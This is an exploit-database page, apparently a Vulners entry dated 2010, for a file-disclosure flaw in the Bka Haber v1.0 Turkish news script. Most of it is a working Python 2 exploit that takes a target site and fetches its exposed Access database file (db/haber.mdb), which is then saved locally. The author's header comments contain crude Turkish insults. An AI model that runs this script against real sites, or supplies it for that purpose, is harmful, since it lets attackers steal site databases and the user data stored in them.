Lucene search
K

Bka Haber 1.0 (Tr) - File Disclosure

🗓️ 02 Oct 2010 00:00:00Reported by ZoRLuType 
exploitpack
 exploitpack
👁 15 Views

Bka Haber v1.0 (Tr) File Disclosure Exploit # Desc. : its not Database # Tested : Windows XP Professional sp3 # Author : ZoRLu / http://inj3ct0r.com/author/577 # Date : 02/10/2010

Code
#!/usr/bin/env python
#-*- coding:cp1254 -*-

'''
# Title        : Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)
# Desc.        : its not Database
# Down. Script : http://www.scriptci.com/modules.php?name=Downloads&d_op=getit&lid=475
# Proof        : http://img822.imageshack.us/img822/3568/filedisc.jpg
# Tested       : Windows XP Professional sp3
# Author       : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn     : [email protected]
# Home         : http://z0rlu.blogspot.com
# Thanks       : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date         : 02/10/2010
# Tesekkur     : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi      : Dont Forget My Python Vers: 2.7 
# Lakirdi      : Okudugumuz icin Cezalandiran Sisteme Sarkitiyim  / 3227 Orrospu Cocugu Yakinda Sinemalarda :P
# Lakirdi      : off ulan off / http://www.youtube.com/watch?v=RV7Wj0KKVxo
'''

import sys, urllib2, re, os, time

def indiriyoruz(url):
	
	import urllib
	aldosyayi = urllib.urlopen(url)
	indiraq = open(url.split('/')[-1], 'wb')
	indiraq.write(aldosyayi.read())
	aldosyayi.close()
	indiraq.close()

if len(sys.argv) < 2:
					import os
					os.system('cls')
					os.system('clear')
					os.system('color 2')
					print "_______________________________________________________________"
					print "                                                               "
					print " Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)             "
					print "                                                               "
					print " coded by ZoRLu                                                "
					print "                                                               "
					print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
					print "                                                               "
					print "_______________________________________________________________"
					sys.exit(1)

''' link kontrol 1 '''
					
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != add2:
    print "\nnwhere is  it: " + add2
    print "okk I will add"
    time.sleep(2)
    sitemiz += add2
    print "its ok" + " " + sitemiz
    
if sitemiz[:7]  != add:
    print "\nwhere is it: " + add
    print "okk I will add"
    time.sleep(2)
    sitemiz =  add + sitemiz
    print "its ok" + " " + sitemiz

vulnfile = "db/haber.mdb"
url2 = sitemiz + vulnfile

''' link kontrol 2 '''

try:
    adreskontrol = urllib2.urlopen(url2).read()
    
    if len(adreskontrol) > 0:
                                        
        print "\nGood Job Bro!"
	
except urllib2.HTTPError:
		import os
		import sys
		print "\nForbidden Sorry! Server has a Security!"
		sys.exit(1)
	

''' dosya indiriliyor '''

if __name__ == '__main__':
	import sys
	if len(sys.argv) == 2:
		print "\nFile is Downloading\n"
		try:
			indiriyoruz(url2)
		except IOError:
			print '\nFilename not found.'

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2010 00:00Current
7.4High risk
Vulners AI Score7.4
15